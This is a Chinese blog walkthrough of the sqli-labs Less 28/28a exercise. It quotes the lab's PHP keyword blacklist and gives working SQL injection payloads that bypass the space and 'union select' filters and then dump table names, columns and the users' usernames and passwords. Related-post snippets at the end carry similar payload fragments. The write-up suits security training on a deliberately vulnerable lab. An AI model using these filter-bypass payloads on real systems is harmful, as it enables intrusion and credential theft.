Less 28-28a

最新推荐文章于 2023-06-20 21:35:35 发布
最新推荐文章于 2023-06-20 21:35:35 发布
阅读量460 收藏
点赞数
分类专栏: # SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43901998/article/details/107436103
版权

文章目录

1. 题目分析

首先题目告诉我们会吃掉我们的unionselect
然后通过?id=1')%26%261=1;%00测试出来,id的是被('')包裹的。

接着看一下源码的blacklist

function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);				//strip out /*
$id= preg_replace('/[--]/',"", $id);				//Strip out --.
$id= preg_replace('/[#]/',"", $id);					//Strip out #.
$id= preg_replace('/[ +]/',"", $id);	    		//Strip out spaces.
//$id= preg_replace('/select/m',"", $id);	   		 	//Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);	    		//Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id);	    //Strip out UNION & SELECT.
return $id;
}

这里过滤了/*,--,#,空格,以及不区分大小写的union+select

这里由于存在空格过滤,因此可以使用一些特殊的空白字符%a0来代替空格进而绕过空格过滤。之前在less27也说过,由于环境的原因,像%a0这类的特殊字符在windows平台上不能有效的使用。

但是,最近又发现了一个新的绕过空格过滤的方法,可以使用/*%0a*/,这个东西用于SQL语句中,也会被翻译成空格。

2. 注入思路

本关,我们就采用联合注入这一手段。
有两个关键点:

  1. 绕过空格使用/*%0a*/
  2. 绕过union select过滤,由于源代码的过滤机制是只有碰到union连着select的时候才会过滤,因此我们使用union distinct union进行绕过。

3. 注入过程

payload

?id=0%27)/*%0a*/UniOn/*%0a*/distinct/*%0a*/SeLecT/*%0a*/1,2,3;%00

爆表:

?id=0%27)/*%0a*/UniOn/*%0a*/distinct/*%0a*/SeLecT/*%0a*/1,(select(group_concat(table_name))from(information_schema.tables)where(table_schema="security")),(select(group_concat(column_name))from(information_schema.columns)where(table_schema="security"%26%26table_name="users"));%00

在这里插入图片描述

users的值

?id=0%27)/*%0a*/UniOn/*%0a*/distinct/*%0a*/SeLecT/*%0a*/1,(select(group_concat(username))from(users)),(select(group_concat(password))from(users));%00

在这里插入图片描述
后面的28a的话,依然可以使用本关的payload

4. 小结

这次通关的做法,主要是学习了两个绕过机制。
使用/*%0a*/去绕过空格过滤。
使用union distinct select绕过union select过滤。
从而实现了最终的联合注入。

老司机开代码
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ICOM-28A使用方法.txt
07-25
ICOM-28A车载电台使用方法.txt
sp-28a单片机并口下载原理图
07-24
此原理图详细描叙了并口单片机实验班的电路图可以用来进行制版
sqlilabs less-28~less-28a
TA不懒,但还没有添加简介
07-22 660
sqlilabs less-28~less-8a
sqli-labs (less-28 and less-28a)
kukudeshuo的博客
03-12 876
sqli-labs (less-28 and less-28a) less-28 进入28关,输入ID=1 查看源代码 这里发现基本与27关一样,依然采用大小写混合绕过 http://127.0.0.1/sql1/Less-28/?id=1' #回显错误 http://127.0.0.1/sql1/Less-28/?id=1');%00 #正常显示 判断闭合方式为’);%00,并且为字符型注入 确定回显位置 http://127.0.0.1/sql1/Less-28/?id=111') %a0 Un
sqli-labs (less25-less28a)
Xi4or0uji
08-04 414
这里开始就是各种花式绕waf了,肉鸡打算把它们放在一篇,所以可能会很长 less 25 or && and 至于怎么绕? 大小写:Or、oR 重复:oorr、anandd 符号:&&、|| 各种编码:0x.....、unicode 然后..........没有然后了(想不到了 剩下的payload顺便给一给 ?id=1' oorr extract...
sqli-labs:less-28a
羽的博客
10-11 107
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; char...
【sqli-labs】 less28 GET- Error based -All you Union&Select Belong to us -String -Single quote with pa...
ajxi63204的博客
01-28 118
这个不是基于错误的吧,看源码可以知道错误并没有输出 那就使用;%00和order by试一下 http://192.168.136.128/sqli-labs-master/Less-28/?id=1')%a0order%a0by%a03;%00 http://192.168.136.128/sqli-labs-master/Less-28/?id=1')%...
JEDEC JESD82-28A.01-2023
05-23
Fully Buffered DIMM Design for Test, Design for Validation (DFx).pdf
311142040-17182-28A_数据库系统1
08-03
【数据库系统】是计算机科学中的一个核心领域,主要关注如何高效、安全地存储和管理数据。在本试题中,涉及的知识点主要集中在数据库事务的ACID特性、候选键的概念、SQL语句的基本操作等方面。 ...
KYN28A-12高压开关柜使用说明书.zip
12-22
《KYN28A-12高压开关柜使用说明书》是电力系统中常见的设备操作与维护文档,主要针对KYN28A-12型号的高压开关柜进行详细阐述。这款开关柜是电力行业中广泛使用的中压开关设备,主要用于12kV的电力分配和控制。以下是...
Sqli-labs之Less-28和Less-28a
m0_46315342的博客
06-04 639
                                          &nbs...
sqli-labs:less-28(过滤了union和select)
羽的博客
09-15 247
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; cha...
[靶场] SQLi-Labs Less28-Less36
3hex的博客
09-26 190
提供主要的语句,略去探测数据库名,表名,字段名的步骤。 31.Less28 请求方式 注入方式 类型 备注 GET 基于报错注入(Union内联注入) 字符型 过滤关键词select、union以及组合,单引号、括号闭合 1. 正常提交 http://127.0.0.1:8003/Less-28/?id=1 2. 语句报错 http://127.0.0.1:8003/Less-28/?id=1 1'2"3 http://127.0.0.1:8003.
通过sqli-labs学习sql注入——进阶挑战之less23-28a
热门推荐
giantbranch的专栏
06-10 1万+
本文链接:http://blog.csdn.net/u012763794/article/details/51457142   这次我又来了,Advanced Injections(进阶挑战),就是一些过滤绕过的东西了,基础挑战看这个两篇 最近搞逆向破解去了,http://www.giantbranch.cn/myblog/?p=27,所以这个拖得太久了,今天完工   通过sqli-la...
Sqli-labs Less25-28 绕过过滤函数对字符的过滤 - GET
kevinhanser
08-10 498
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 25: GET - Error based - All your OR &amp; AND belong to us - String Single Quote 源代码 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; function...
sqli-labs/Less-28
m0_71299382的博客
11-20 336
sqli-labs第二十八a关
SQL注入详解 23-28
君莫hacker的博客
10-08 661
目录Less-23Less-24Less-25Less-26Less-27Less-28Less-29Less-30Less-31Less-32Less-33Less-34Less-35Less-36 Less-23 确定注入类型并判断显示位置 -1' union select 22,33,44 and '1'='1 查看当前数据库 -1' union select 3,database(),3 or '12'='12 爆表 -1' union select 22,group_conca
sqli-labs详解------持续更新
最新发布
yuqie的博客
06-20 2714
如今已经很少使用手动注入了,写这篇的初心在于掌握并熟记手动注入,
BYD BF6612HT28A-MCU规格书
10-13
"BYD BF6612HT28A-MCU规格书" 本文将详细介绍BYD Semiconductor Co., Ltd. 推出的BF6612HT28A-A1-SJLX微控制器单元(MCU),这是一款集成了多种功能的高性能芯片,适用于各种嵌入式应用。 BF6612HT28A-MCU在工作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值